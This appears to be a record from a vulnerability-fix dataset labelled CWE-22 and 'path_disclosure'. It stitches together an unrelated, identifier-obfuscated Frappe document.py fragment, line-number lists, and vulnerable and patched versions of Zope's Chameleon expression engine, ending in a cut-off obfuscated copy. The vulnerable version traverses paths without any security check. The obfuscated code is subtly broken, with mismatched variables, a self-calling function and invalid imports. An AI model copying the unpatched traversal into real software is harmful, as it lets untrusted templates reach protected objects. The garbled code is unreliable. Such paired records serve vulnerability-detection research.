VAR_90 = VAR_70.get(VAR_25, None)
if VAR_90 and VAR_69.event == VAR_90:
FUNC_82(VAR_69)
elif VAR_69.event=='Method' and VAR_25 == VAR_69.method:
FUNC_82(VAR_69)
@FUNC_2.__func__
def FUNC_45(self):
self.docstatus = 1
self.save()
@FUNC_2.__func__
def FUNC_46(self):
self.docstatus = 2
self.save()
@FUNC_2.__func__
def FUNC_47(self):
self._submit()
@FUNC_2.__func__
def FUNC_48(self):
self._cancel()
def FUNC_49(self, VAR_11=False):
frappe.delete_doc(self.doctype, self.name, VAR_11 = ignore_permissions, flags=self.flags)
def FUNC_50(self):
self.load_doc_before_save()
self.reset_seen()
if self._action in ("save", "submit"):
self.run_method("before_validate")
if self.flags.ignore_validate:
return
if self._action=="save":
self.run_method("validate")
self.run_method("before_save")
elif self._action=="submit":
self.run_method("validate")
self.run_method("before_submit")
elif self._action=="cancel":
self.run_method("before_cancel")
elif self._action=="update_after_submit":
self.run_method("before_update_after_submit")
self.set_title_field()
def FUNC_51(self):
self._doc_before_save = None
if not self.is_new():
try:
self._doc_before_save = frappe.get_doc(self.doctype, self.name)
except frappe.DoesNotExistError:
self._doc_before_save = None
frappe.clear_last_message()
def FUNC_52(self):
VAR_71 = self.get_doc_before_save()
if self._action=="save":
self.run_method("on_update")
elif self._action=="submit":
self.run_method("on_update")
self.run_method("on_submit")
elif self._action=="cancel":
self.run_method("on_cancel")
self.check_no_back_links_exist()
elif self._action=="update_after_submit":
self.run_method("on_update_after_submit")
self.clear_cache()
self.notify_update()
update_global_search(self)
self.save_version()
self.run_method('on_change')
if (self.doctype, self.name) in frappe.flags.currently_saving:
frappe.flags.currently_saving.remove((self.doctype, self.name))
self.latest = None
def FUNC_53(self):
frappe.clear_document_cache(self.doctype, self.name)
def FUNC_54(self):
if getattr(self.meta, 'track_seen', False):
frappe.db.set_value(self.doctype, self.name, "_seen", json.dumps([frappe.session.user]), VAR_27=False)
def FUNC_55(self):
if frappe.flags.in_patch: return
frappe.publish_realtime("doc_update", {"modified": self.modified, "doctype": self.doctype, "name": self.name},
VAR_2=self.doctype, docname=self.name, after_commit=True)
if not self.meta.get("read_only") and not self.meta.get("issingle") and \
not self.meta.get("istable"):
VAR_91 = {
"doctype": self.doctype,
"name": self.name,
"user": frappe.session.user
}
frappe.publish_realtime("list_update", VAR_91, after_commit=True)
def FUNC_56(self, VAR_18, VAR_26=None, VAR_27=True, VAR_28=False, VAR_29=False):
if isinstance(VAR_18, dict):
self.update(VAR_18)
else:
self.set(VAR_18, VAR_26)
if VAR_27 and (self.doctype, self.name) not in frappe.flags.currently_saving:
self.set("modified", now())
self.set("modified_by", frappe.session.user)
self.load_doc_before_save()
self.run_method('before_change')
frappe.db.set_value(self.doctype, self.name, VAR_18, VAR_26,
self.modified, self.modified_by, VAR_27=update_modified)
self.run_method('on_change')
if VAR_28:
self.notify_update()
self.clear_cache()
if VAR_29:
frappe.db.commit()
def FUNC_57(self, VAR_18):
return frappe.db.get_value(self.doctype, self.name, VAR_18)
def FUNC_58(self):
from frappe.model.delete_doc import check_if_doc_is_linked, check_if_doc_is_dynamically_linked
if not self.flags.ignore_links:
check_if_doc_is_linked(self, VAR_25="Cancel")
check_if_doc_is_dynamically_linked(self, VAR_25="Cancel")
def FUNC_59(self):
if (not getattr(self.meta, 'track_changes', False)
or self.doctype == 'Version'
or self.flags.ignore_version
or frappe.flags.in_install
or (not self._doc_before_save and frappe.flags.in_patch)):
return
VAR_72 = frappe.new_doc('Version')
if not self._doc_before_save:
VAR_72.for_insert(self)
VAR_72.insert(VAR_11=True)
elif VAR_72.set_diff(self._doc_before_save, self):
VAR_72.insert(VAR_11=True)
if not frappe.flags.in_migrate:
follow_document(self.doctype, self.name, frappe.session.user)
@staticmethod
def FUNC_60(VAR_30):
def FUNC_83(self, VAR_73):
if isinstance(VAR_73, dict):
if not self.get("_return_value"):
self._return_value = {}
self._return_value.update(VAR_73)
else:
self._return_value = VAR_73 or self.get("_return_value")
def FUNC_84(VAR_6, *VAR_74):
def FUNC_86(self, VAR_25, *VAR_0, **VAR_1):
FUNC_83(self, VAR_6(self, *VAR_0, **VAR_1))
for VAR_30 in VAR_74:
FUNC_83(self, VAR_30(self, VAR_25, *VAR_0, **VAR_1))
return self._return_value
return FUNC_86
def FUNC_85(self, *VAR_0, **VAR_1):
VAR_74 = []
VAR_25 = VAR_30.__name__
VAR_92 = frappe.get_doc_hooks()
for handler in VAR_92.get(self.doctype, {}).get(VAR_25, []) \
+ VAR_92.get("*", {}).get(VAR_25, []):
VAR_74.append(frappe.get_attr(handler))
VAR_93 = FUNC_84(VAR_30, *VAR_74)
return VAR_93(self, VAR_25, *VAR_0, **VAR_1)
return FUNC_85
def FUNC_61(self, VAR_31):
VAR_25 = getattr(self, VAR_31, None)
if not VAR_6:
raise NotFound("Method {0} not found".format(VAR_31))
FUNC_61(getattr(VAR_25, '__func__', VAR_25))
def FUNC_62(self, VAR_18, VAR_32, VAR_33, VAR_34=None, VAR_35=None):
VAR_75 = {
"in": _("one of"),
"not in": _("none of"),
"^": _("beginning with"),
}
if not VAR_34:
doc = self
VAR_76 = VAR_34.get_value(VAR_18)
VAR_19 = VAR_34.meta.get_field(VAR_18)
VAR_33 = VAR_34.cast(VAR_33, VAR_19)
if not frappe.compare(VAR_76, VAR_32, VAR_33):
VAR_94 = VAR_34.meta.get_label(VAR_18)
VAR_95 = VAR_75.get(VAR_32, condition)
if VAR_34.parentfield:
VAR_88 = _("Incorrect VAR_26 in row {0}: {1} must be {2} {3}").format(VAR_34.idx, VAR_94, VAR_95, VAR_33)
else:
VAR_88 = _("Incorrect VAR_26: {0} must be {1} {2}").format(VAR_94, VAR_95, VAR_33)
msgprint(VAR_88, VAR_35=raise_exception or True)
def FUNC_63(self, VAR_36, VAR_35=None):
if not (isinstance(self.get(VAR_36), list) and len(self.get(VAR_36)) > 0):
VAR_94 = self.meta.get_label(VAR_36)
frappe.throw(_("Table {0} cannot be empty").format(VAR_94), VAR_35 or frappe.EmptyTableError)
def FUNC_64(self, VAR_34, VAR_37=None):
if not VAR_37:
fieldnames = (VAR_19.fieldname for VAR_19 in
VAR_34.meta.get("fields", {"fieldtype": ["in", ["Currency", "Float", "Percent"]]}))
for VAR_18 in VAR_37:
VAR_34.set(VAR_18, flt(VAR_34.get(VAR_18), self.precision(VAR_18, VAR_34.parentfield)))
def FUNC_65(self):
return "/app/Form/{VAR_2}/{VAR_3}".format(VAR_2=self.doctype, VAR_3=self.name)
def FUNC_66(self, VAR_38='Comment', VAR_39=None, VAR_40=None, VAR_41=None, VAR_42=None, VAR_43=None):
VAR_68 = frappe.get_doc({
"doctype":"Comment",
'comment_type': VAR_38,
"comment_email": VAR_40 or frappe.session.user,
"comment_by": VAR_43,
"reference_doctype": self.doctype,
"reference_name": self.name,
"content": VAR_39 or VAR_38,
"link_doctype": VAR_41,
"link_name": VAR_42
}).insert(VAR_11=True)
return VAR_68
def FUNC_67(self, VAR_44=None):
if not VAR_44:
user = frappe.session.user
if self.meta.track_seen:
VAR_96 = self.get('_seen') or []
VAR_96 = frappe.parse_json(VAR_96)
if VAR_44 not in VAR_96:
_seen.append(VAR_44)
frappe.db.set_value(self.doctype, self.name, '_seen', json.dumps(VAR_96), VAR_27=False)
frappe.local.flags.commit = True
def FUNC_68(self, VAR_44=None):
if not VAR_44:
user = frappe.session.user
if hasattr(self.meta, 'track_views') and self.meta.track_views:
frappe.get_doc({
"doctype": "View Log",
"viewed_by": frappe.session.user,
"reference_doctype": self.doctype,
"reference_name": self.name,
}).insert(VAR_11=True)
frappe.local.flags.commit = True
def FUNC_69(self):
return hashlib.sha224(get_datetime_str(self.creation).encode()).hexdigest()
def FUNC_70(self):
VAR_77 = getattr(self, "_liked_by", None)
if VAR_77:
return json.loads(VAR_77)
else:
return []
def FUNC_71(self, VAR_45, VAR_26):
if not self.get("__onload"):
self.set("__onload", frappe._dict())
self.get("__onload")[VAR_45] = VAR_26
def FUNC_72(self, VAR_45=None):
if not VAR_45:
return self.get("__onload", frappe._dict())
return self.get('__onload')[VAR_45]
def FUNC_73(self, VAR_4, **VAR_1):
from frappe.utils.background_jobs import enqueue
if hasattr(self, '_' + VAR_4):
action = '_' + VAR_4
if file_lock.lock_exists(self.get_signature()):
frappe.throw(_('This document is currently queued for execution. Please try again'),
title=_('Document Queued'))
self.lock()
enqueue('frappe.model.document.execute_action', VAR_2=self.doctype, VAR_3=self.name,
VAR_4=action, **VAR_1)
def FUNC_74(self, VAR_46=None):
VAR_78 = self.get_signature()
if file_lock.lock_exists(VAR_78):
VAR_97 = True
if VAR_46:
for i in range(VAR_46):
time.sleep(1)
if not file_lock.lock_exists(VAR_78):
VAR_97 = False
break
if VAR_97:
raise frappe.DocumentLockedError
file_lock.create_lock(VAR_78)
def FUNC_75(self):
file_lock.delete_lock(self.get_signature())
def FUNC_76(self, VAR_47, VAR_48):
if date_diff(self.get(VAR_48), self.get(VAR_47)) < 0:
frappe.throw(_('{0} must be after {1}').format(
frappe.bold(self.meta.get_label(VAR_48)),
frappe.bold(self.meta.get_label(VAR_47)),
), frappe.exceptions.InvalidDates)
def FUNC_77(self):
VAR_79 = frappe.get_all('ToDo',
fields=['owner'],
filters={
'reference_type': self.doctype,
'reference_name': self.name,
'status': ('!=', 'Cancelled'),
})
VAR_80 = set([assignment.owner for assignment in VAR_79])
return VAR_80
def FUNC_78(self, VAR_49):
from frappe.desk.doctype.tag.tag import DocTags
DocTags(self.doctype).add(self.name, VAR_49)
def FUNC_79(self):
from frappe.desk.doctype.tag.tag import DocTags
return DocTags(self.doctype).get_tags(self.name).split(",")[1:]
def FUNC_1(VAR_2, VAR_3, VAR_4, **VAR_1):
VAR_34 = frappe.get_doc(VAR_2, VAR_3)
VAR_34.unlock()
try:
getattr(VAR_34, VAR_4)(**VAR_1)
except Exception:
frappe.db.rollback()
if frappe.local.message_log:
VAR_88 = json.loads(frappe.local.message_log[-1]).get('message')
else:
VAR_88 = '<pre><code>' + frappe.get_traceback() + '</pre></code>'
VAR_34.add_comment('Comment', _('Action Failed') + '<br><br>' + VAR_88)
VAR_34.notify_update()
| [
1,
2,
3,
21,
22,
23,
24,
27,
31,
33,
34,
36,
37,
45,
46,
48,
49,
54,
58,
60,
62,
65,
71,
75,
77,
82,
85,
92,
94,
96,
101,
108,
111,
114,
116,
118,
120,
123,
125,
127,
133,
137,
147,
151,
156,
158,
164,
173,
174,
177,
182,
187,
191,
196,
201,
207,
211,
213,
216,
219,
222,
224,
235,
241,
242,
243,
244,
253,
254,
257,
260,
263,
264,
265,
269,
270,
273,
274,
277,
281,
285,
289,
292,
297,
299,
302,
304,
308,
310,
316,
320,
323,
326,
328,
329,
334,
337,
338,
341,
343,
347,
348,
350,
351,
360,
361,
366,
372,
376,
378,
379,
381,
383,
389,
392,
394,
398,
401,
406,
409,
412,
413,
418,
423,
425,
428,
430,
434,
439,
444,
447,
451,
453,
461,
464,
473,
481,
483,
487,
490,
501,
512,
517,
525,
528,
532,
541,
545,
547,
552,
559,
563,
565,
571,
575,
579,
580,
584,
588,
590,
593,
596,
598,
602,
607,
610,
612,
616,
622,
627,
630,
633,
636,
637,
639,
640,
646,
650,
657,
659,
663,
665,
668,
672,
674,
678,
681,
682,
689,
695,
710,
715,
717,
720,
722,
730,
734,
739,
751,
761,
764,
770,
772,
776,
780,
784,
786,
788,
789,
790,
794,
798,
801,
804,
807,
812,
816,
818,
823,
828,
833,
845,
850,
854,
856,
859,
863,
865,
868,
873,
876,
878,
886,
889,
894,
901,
903,
905,
912,
918,
924,
929,
934,
938,
941,
946,
948,
951,
952,
955,
958,
969,
971,
981,
984,
989,
991,
1002,
1003,
1006,
1008,
1010,
1012,
1015,
1017,
1020,
1025,
1029,
1032,
1041,
1044,
1047,
1058,
1060,
1061,
1064,
1066,
1068,
1071,
1073,
1076,
1080,
1084,
1091,
1094,
1095,
1102,
1110,
1112,
1116,
1127,
1133,
1135,
1137,
1145,
1148,
1150,
1157,
1166,
1169,
1171,
1174,
1182,
1183,
1185,
1191,
1194,
1200,
1203,
1207,
1210,
1212,
1225,
1230,
1234,
1239,
1244,
1253,
1257,
1264,
1269,
1273,
1275,
1279,
1280,
1281,
1283,
1286,
1290,
1294,
1298,
1312,
1316,
1317,
1327,
1336,
1339,
1344,
1349,
1358,
1359,
1364,
1367,
1368,
1369,
1370,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
51,
79,
1351,
81,
82,
83,
84,
85,
86,
87,
88,
130,
135,
139,
140,
184,
189,
190,
191,
192,
198,
204,
205,
206,
207,
208,
283,
287,
288,
289,
290,
291,
292,
293,
294,
345,
363,
368,
403,
408,
432,
436,
455,
534,
543,
567,
592,
624,
691,
692,
693,
694,
695,
696,
697,
732,
733,
734,
735,
736,
737,
738,
739,
740,
766,
835,
847,
870,
915,
921,
927,
932,
936,
940,
941,
942,
943,
944,
945,
946,
947,
973,
983,
984,
985,
986,
987,
988,
1022,
1027,
1043,
1044,
1045,
1046,
1047,
1048,
1049,
1050,
1051,
1052,
1053,
1082,
1086,
1093,
1115,
1116,
1117,
1118,
1119,
1159,
1160,
1187,
1193,
1194,
1195,
1196,
1205,
1209,
1210,
1211,
1227,
1241,
1255,
1277,
1278,
1296,
1297,
1298,
1299,
1314,
1319,
1320,
1321,
1341,
1346
] | [
1,
2,
3,
21,
22,
23,
24,
27,
31,
33,
34,
36,
37,
45,
46,
48,
49,
54,
58,
60,
62,
65,
71,
75,
77,
82,
85,
92,
94,
96,
101,
108,
111,
114,
116,
118,
120,
123,
125,
127,
133,
137,
147,
151,
156,
158,
164,
173,
174,
177,
182,
187,
191,
196,
201,
207,
211,
213,
216,
219,
222,
224,
235,
241,
242,
243,
244,
253,
254,
257,
260,
263,
264,
265,
269,
270,
273,
274,
277,
281,
285,
289,
292,
297,
299,
302,
304,
308,
310,
316,
320,
323,
326,
328,
329,
334,
337,
338,
341,
343,
347,
348,
350,
351,
360,
361,
366,
372,
376,
378,
379,
381,
383,
389,
392,
394,
398,
401,
406,
409,
412,
413,
418,
423,
425,
428,
430,
434,
439,
444,
447,
451,
453,
461,
464,
473,
481,
483,
487,
490,
501,
512,
517,
525,
528,
532,
541,
545,
547,
552,
559,
563,
565,
571,
575,
579,
580,
584,
588,
590,
593,
596,
598,
602,
607,
610,
612,
616,
622,
627,
630,
633,
636,
637,
639,
640,
646,
650,
657,
659,
663,
665,
668,
672,
674,
678,
681,
682,
689,
695,
710,
715,
717,
720,
722,
730,
734,
739,
751,
761,
764,
770,
772,
776,
780,
784,
786,
788,
789,
790,
794,
798,
801,
804,
807,
812,
816,
818,
823,
828,
833,
845,
850,
854,
856,
859,
863,
865,
868,
873,
876,
878,
886,
889,
894,
901,
903,
905,
912,
918,
924,
929,
934,
938,
941,
946,
948,
951,
952,
955,
958,
969,
971,
981,
984,
989,
991,
1002,
1003,
1006,
1008,
1010,
1012,
1015,
1017,
1020,
1025,
1029,
1032,
1041,
1044,
1047,
1058,
1060,
1061,
1064,
1066,
1068,
1071,
1073,
1076,
1080,
1084,
1091,
1094,
1095,
1102,
1110,
1112,
1116,
1127,
1133,
1135,
1137,
1145,
1148,
1150,
1155,
1157,
1166,
1169,
1171,
1174,
1182,
1183,
1185,
1191,
1194,
1200,
1203,
1207,
1210,
1212,
1225,
1230,
1234,
1239,
1244,
1253,
1257,
1264,
1269,
1273,
1275,
1279,
1280,
1281,
1283,
1286,
1290,
1294,
1298,
1312,
1316,
1317,
1327,
1336,
1339,
1344,
1349,
1358,
1359,
1364,
1367,
1368,
1369,
1370,
26,
27,
28,
29,
30,
31,
32,
33,
34,
35,
36,
37,
38,
39,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
51,
79,
1351,
81,
82,
83,
84,
85,
86,
87,
88,
130,
135,
139,
140,
184,
189,
190,
191,
192,
198,
204,
205,
206,
207,
208,
283,
287,
288,
289,
290,
291,
292,
293,
294,
345,
363,
368,
403,
408,
432,
436,
455,
534,
543,
567,
592,
624,
691,
692,
693,
694,
695,
696,
697,
732,
733,
734,
735,
736,
737,
738,
739,
740,
766,
835,
847,
870,
915,
921,
927,
932,
936,
940,
941,
942,
943,
944,
945,
946,
947,
973,
983,
984,
985,
986,
987,
988,
1022,
1027,
1043,
1044,
1045,
1046,
1047,
1048,
1049,
1050,
1051,
1052,
1053,
1082,
1086,
1093,
1115,
1116,
1117,
1118,
1119,
1159,
1160,
1187,
1193,
1194,
1195,
1196,
1205,
1209,
1210,
1211,
1227,
1241,
1255,
1277,
1278,
1296,
1297,
1298,
1299,
1314,
1319,
1320,
1321,
1341,
1346
] |
0CWE-22
| """``chameleon.tales`` expressions."""
import warnings
from ast import NodeTransformer
from ast import parse
from chameleon.astutil import Static
from chameleon.astutil import Symbol
from chameleon.codegen import template
from chameleon.tales import NotExpr
from chameleon.tales import StringExpr
from AccessControl.ZopeGuards import guarded_apply
from AccessControl.ZopeGuards import guarded_getattr
from AccessControl.ZopeGuards import guarded_getitem
from AccessControl.ZopeGuards import guarded_iter
from AccessControl.ZopeGuards import protected_inplacevar
from OFS.interfaces import ITraversable
from RestrictedPython import RestrictingNodeTransformer
from RestrictedPython.Utilities import utility_builtins
from z3c.pt import expressions
from zExceptions import NotFound
from zExceptions import Unauthorized
from zope.interface import implementer
from zope.tales.tales import ExpressionEngine
from zope.traversing.adapters import traversePathElement
from zope.traversing.interfaces import TraversalError
from .Expressions import render
from .interfaces import IZopeAwareEngine
_marker = object()
zope2_exceptions = (
AttributeError,
LookupError,
NameError,
TypeError,
ValueError,
NotFound,
Unauthorized,
TraversalError,
)
def static(obj):
return Static(template("obj", obj=Symbol(obj), mode="eval"))
class BoboAwareZopeTraverse:
traverse_method = 'restrictedTraverse'
__slots__ = ()
@classmethod
def traverse(cls, base, request, path_items):
"""See ``zope.app.pagetemplate.engine``."""
path_items = list(path_items)
path_items.reverse()
while path_items:
name = path_items.pop()
if name == '_':
warnings.warn('Traversing to the name `_` is deprecated '
'and will be removed in Zope 6.',
DeprecationWarning)
elif name.startswith('_'):
raise NotFound(name)
if ITraversable.providedBy(base):
base = getattr(base, cls.traverse_method)(name)
else:
base = traversePathElement(base, name, path_items,
request=request)
return base
def __call__(self, base, econtext, call, path_items):
request = econtext.get('request')
if path_items:
base = self.traverse(base, request, path_items)
if call is False:
return base
if getattr(base, '__call__', _marker) is not _marker or \
callable(base):
base = render(base, econtext)
return base
class TrustedBoboAwareZopeTraverse(BoboAwareZopeTraverse):
traverse_method = 'unrestrictedTraverse'
__slots__ = ()
def __call__(self, base, econtext, call, path_items):
request = econtext.get('request')
base = self.traverse(base, request, path_items)
if call is False:
return base
if getattr(base, '__call__', _marker) is not _marker or \
isinstance(base, type):
return base()
return base
class PathExpr(expressions.PathExpr):
exceptions = zope2_exceptions
traverser = Static(template(
"cls()", cls=Symbol(BoboAwareZopeTraverse), mode="eval"
))
class TrustedPathExpr(PathExpr):
traverser = Static(template(
"cls()", cls=Symbol(TrustedBoboAwareZopeTraverse), mode="eval"
))
class NocallExpr(expressions.NocallExpr, PathExpr):
pass
class ExistsExpr(expressions.ExistsExpr):
exceptions = zope2_exceptions
class RestrictionTransform(NodeTransformer):
secured = {
'_getattr_': guarded_getattr,
'_getitem_': guarded_getitem,
'_apply_': guarded_apply,
'_getiter_': guarded_iter,
'_inplacevar_': protected_inplacevar,
}
def visit_Name(self, node):
value = self.secured.get(node.id)
if value is not None:
return Symbol(value)
return node
class UntrustedPythonExpr(expressions.PythonExpr):
restricted_python_transformer = RestrictingNodeTransformer()
page_templates_expression_transformer = RestrictionTransform()
# Make copy of parent expression builtins
builtins = expressions.PythonExpr.builtins.copy()
# Update builtins with Restricted Python utility builtins
builtins.update({
name: static(builtin) for (name, builtin) in utility_builtins.items()
})
def parse(self, string):
encoded = string.encode('utf-8')
node = parse(encoded, mode='eval')
# Run Node Transformation from RestrictedPython:
self.restricted_python_transformer.visit(node)
# Run PageTemplate.expression RestrictedPython Transform:
self.page_templates_expression_transformer.visit(node)
return node
# Whether an engine is Zope aware does not depend on the class
# but how it is configured - especially, that is uses a Zope aware
# `PathExpr` implementation.
# Nevertheless, we mark the class as "Zope aware" for simplicity
# assuming that users of the class use a proper `PathExpr`
@implementer(IZopeAwareEngine)
class ChameleonEngine(ExpressionEngine):
"""Expression engine for ``chameleon.tales``.
Only partially implemented: its ``compile`` is currently unusable
"""
def compile(self, expression):
raise NotImplementedError()
types = dict(
python=UntrustedPythonExpr,
string=StringExpr,
not_=NotExpr,
exists=ExistsExpr,
path=PathExpr,
provider=expressions.ProviderExpr,
nocall=NocallExpr)
def createChameleonEngine(types=types, untrusted=True, **overrides):
e = ChameleonEngine()
def norm(k):
return k[:-1] if k.endswith("_") else k
e.untrusted = untrusted
ts = e.types
for k, v in types.items():
k = norm(k)
e.registerType(k, v)
for k, v in overrides.items():
k = norm(k)
if k in ts:
del ts[k]
e.registerType(k, v)
return e
def createTrustedChameleonEngine(**overrides):
ovr = dict(python=expressions.PythonExpr, path=TrustedPathExpr)
ovr.update(overrides)
return createChameleonEngine(untrusted=False, **ovr)
_engine = createChameleonEngine()
def getEngine():
return _engine
_trusted_engine = createTrustedChameleonEngine()
def getTrustedEngine():
return _trusted_engine
| """``chameleon.tales`` expressions."""
import warnings
from ast import NodeTransformer
from ast import parse
from chameleon.astutil import Static
from chameleon.astutil import Symbol
from chameleon.codegen import template
from chameleon.tales import NotExpr
from chameleon.tales import StringExpr
from AccessControl.SecurityManagement import getSecurityManager
from AccessControl.ZopeGuards import guarded_apply
from AccessControl.ZopeGuards import guarded_getattr
from AccessControl.ZopeGuards import guarded_getitem
from AccessControl.ZopeGuards import guarded_iter
from AccessControl.ZopeGuards import protected_inplacevar
from OFS.interfaces import ITraversable
from RestrictedPython import RestrictingNodeTransformer
from RestrictedPython.Utilities import utility_builtins
from z3c.pt import expressions
from zExceptions import NotFound
from zExceptions import Unauthorized
from zope.interface import implementer
from zope.tales.tales import ExpressionEngine
from zope.traversing.adapters import traversePathElement
from zope.traversing.interfaces import TraversalError
from .Expressions import render
from .interfaces import IZopeAwareEngine
_marker = object()
zope2_exceptions = (
AttributeError,
LookupError,
NameError,
TypeError,
ValueError,
NotFound,
Unauthorized,
TraversalError,
)
def static(obj):
return Static(template("obj", obj=Symbol(obj), mode="eval"))
class BoboAwareZopeTraverse:
traverse_method = 'restrictedTraverse'
__slots__ = ()
@classmethod
def traverse(cls, base, request, path_items):
"""See ``zope.app.pagetemplate.engine``."""
validate = getSecurityManager().validate
path_items = list(path_items)
path_items.reverse()
while path_items:
name = path_items.pop()
if ITraversable.providedBy(base):
base = getattr(base, cls.traverse_method)(name)
else:
found = traversePathElement(base, name, path_items,
request=request)
# If traverse_method is something other than
# ``restrictedTraverse`` then traversal is assumed to be
# unrestricted. This emulates ``unrestrictedTraverse``
if cls.traverse_method != 'restrictedTraverse':
base = found
continue
# Special backwards compatibility exception for the name ``_``,
# which was often used for translation message factories.
# Allow and continue traversal.
if name == '_':
warnings.warn('Traversing to the name `_` is deprecated '
'and will be removed in Zope 6.',
DeprecationWarning)
base = found
continue
# All other names starting with ``_`` are disallowed.
# This emulates what restrictedTraverse does.
if name.startswith('_'):
raise NotFound(name)
# traversePathElement doesn't apply any Zope security policy,
# so we validate access explicitly here.
try:
validate(base, base, name, found)
base = found
except Unauthorized:
# Convert Unauthorized to prevent information disclosures
raise NotFound(name)
return base
def __call__(self, base, econtext, call, path_items):
request = econtext.get('request')
if path_items:
base = self.traverse(base, request, path_items)
if call is False:
return base
if getattr(base, '__call__', _marker) is not _marker or \
callable(base):
base = render(base, econtext)
return base
class TrustedBoboAwareZopeTraverse(BoboAwareZopeTraverse):
traverse_method = 'unrestrictedTraverse'
__slots__ = ()
def __call__(self, base, econtext, call, path_items):
request = econtext.get('request')
base = self.traverse(base, request, path_items)
if call is False:
return base
if getattr(base, '__call__', _marker) is not _marker or \
isinstance(base, type):
return base()
return base
class PathExpr(expressions.PathExpr):
exceptions = zope2_exceptions
traverser = Static(template(
"cls()", cls=Symbol(BoboAwareZopeTraverse), mode="eval"
))
class TrustedPathExpr(PathExpr):
traverser = Static(template(
"cls()", cls=Symbol(TrustedBoboAwareZopeTraverse), mode="eval"
))
class NocallExpr(expressions.NocallExpr, PathExpr):
pass
class ExistsExpr(expressions.ExistsExpr):
exceptions = zope2_exceptions
class RestrictionTransform(NodeTransformer):
secured = {
'_getattr_': guarded_getattr,
'_getitem_': guarded_getitem,
'_apply_': guarded_apply,
'_getiter_': guarded_iter,
'_inplacevar_': protected_inplacevar,
}
def visit_Name(self, node):
value = self.secured.get(node.id)
if value is not None:
return Symbol(value)
return node
class UntrustedPythonExpr(expressions.PythonExpr):
restricted_python_transformer = RestrictingNodeTransformer()
page_templates_expression_transformer = RestrictionTransform()
# Make copy of parent expression builtins
builtins = expressions.PythonExpr.builtins.copy()
# Update builtins with Restricted Python utility builtins
builtins.update({
name: static(builtin) for (name, builtin) in utility_builtins.items()
})
def parse(self, string):
encoded = string.encode('utf-8')
node = parse(encoded, mode='eval')
# Run Node Transformation from RestrictedPython:
self.restricted_python_transformer.visit(node)
# Run PageTemplate.expression RestrictedPython Transform:
self.page_templates_expression_transformer.visit(node)
return node
# Whether an engine is Zope aware does not depend on the class
# but how it is configured - especially, that is uses a Zope aware
# `PathExpr` implementation.
# Nevertheless, we mark the class as "Zope aware" for simplicity
# assuming that users of the class use a proper `PathExpr`
@implementer(IZopeAwareEngine)
class ChameleonEngine(ExpressionEngine):
"""Expression engine for ``chameleon.tales``.
Only partially implemented: its ``compile`` is currently unusable
"""
def compile(self, expression):
raise NotImplementedError()
types = dict(
python=UntrustedPythonExpr,
string=StringExpr,
not_=NotExpr,
exists=ExistsExpr,
path=PathExpr,
provider=expressions.ProviderExpr,
nocall=NocallExpr)
def createChameleonEngine(types=types, untrusted=True, **overrides):
e = ChameleonEngine()
def norm(k):
return k[:-1] if k.endswith("_") else k
e.untrusted = untrusted
ts = e.types
for k, v in types.items():
k = norm(k)
e.registerType(k, v)
for k, v in overrides.items():
k = norm(k)
if k in ts:
del ts[k]
e.registerType(k, v)
return e
def createTrustedChameleonEngine(**overrides):
ovr = dict(python=expressions.PythonExpr, path=TrustedPathExpr)
ovr.update(overrides)
return createChameleonEngine(untrusted=False, **ovr)
_engine = createChameleonEngine()
def getEngine():
return _engine
_trusted_engine = createTrustedChameleonEngine()
def getTrustedEngine():
return _trusted_engine
| path_disclosure | {
"code": [
" if name == '_':",
" warnings.warn('Traversing to the name `_` is deprecated '",
" 'and will be removed in Zope 6.',",
" DeprecationWarning)",
" elif name.startswith('_'):",
" raise NotFound(name)",
" base = traversePathElement(base, name, path_items,",
" request=request)"
],
"line_no": [
66,
67,
68,
69,
70,
71,
76,
77
]
} | {
"code": [
"from AccessControl.SecurityManagement import getSecurityManager",
" validate = getSecurityManager().validate",
" found = traversePathElement(base, name, path_items,",
" if cls.traverse_method != 'restrictedTraverse':",
" continue",
" if name == '_':",
" warnings.warn('Traversing to the name `_` is deprecated '",
" DeprecationWarning)",
" base = found",
" if name.startswith('_'):",
" raise NotFound(name)",
" try:",
" base = found",
" raise NotFound(name)"
],
"line_no": [
13,
61,
71,
77,
79,
84,
85,
87,
88,
93,
94,
98,
100,
103
]
} |
import warnings
from ast import NodeTransformer
from ast import .parse
from chameleon.astutil import Static
from chameleon.astutil import Symbol
from chameleon.codegen import template
from chameleon.tales import NotExpr
from chameleon.tales import StringExpr
from AccessControl.ZopeGuards import guarded_apply
from AccessControl.ZopeGuards import guarded_getattr
from AccessControl.ZopeGuards import guarded_getitem
from AccessControl.ZopeGuards import guarded_iter
from AccessControl.ZopeGuards import protected_inplacevar
from OFS.interfaces import ITraversable
from RestrictedPython import RestrictingNodeTransformer
from RestrictedPython.Utilities import utility_builtins
from z3c.pt import .expressions
from zExceptions import NotFound
from zExceptions import Unauthorized
from zope.interface import implementer
from zope.tales.tales import ExpressionEngine
from zope.traversing.adapters import .traversePathElement
from zope.traversing.interfaces import TraversalError
from .Expressions import render
from .interfaces import IZopeAwareEngine
VAR_0 = object()
VAR_1 = (
AttributeError,
LookupError,
NameError,
TypeError,
ValueError,
NotFound,
Unauthorized,
TraversalError,
)
def FUNC_0(VAR_2):
return Static(template("obj", VAR_2=Symbol(VAR_2), mode="eval"))
class CLASS_0:
VAR_8 = 'restrictedTraverse'
__slots__ = ()
@classmethod
def FUNC_5(VAR_9, VAR_10, VAR_11, VAR_12):
VAR_12 = list(VAR_12)
path_items.reverse()
while VAR_12:
VAR_30 = VAR_12.pop()
if VAR_30 == '_':
warnings.warn('Traversing to the VAR_30 `_` is deprecated '
'and will be removed in Zope 6.',
DeprecationWarning)
elif VAR_30.startswith('_'):
raise NotFound(VAR_30)
if ITraversable.providedBy(VAR_10):
VAR_10 = getattr(VAR_10, VAR_9.traverse_method)(VAR_30)
else:
VAR_10 = traversePathElement(VAR_10, VAR_30, VAR_12,
VAR_11=request)
return VAR_10
def __call__(self, VAR_10, VAR_13, VAR_14, VAR_12):
VAR_11 = VAR_13.get('request')
if VAR_12:
VAR_10 = self.traverse(VAR_10, VAR_11, VAR_12)
if VAR_14 is False:
return VAR_10
if getattr(VAR_10, '__call__', VAR_0) is not VAR_0 or \
callable(VAR_10):
VAR_10 = render(VAR_10, VAR_13)
return VAR_10
class CLASS_1(CLASS_0):
VAR_8 = 'unrestrictedTraverse'
__slots__ = ()
def __call__(self, VAR_10, VAR_13, VAR_14, VAR_12):
VAR_11 = VAR_13.get('request')
VAR_10 = self.traverse(VAR_10, VAR_11, VAR_12)
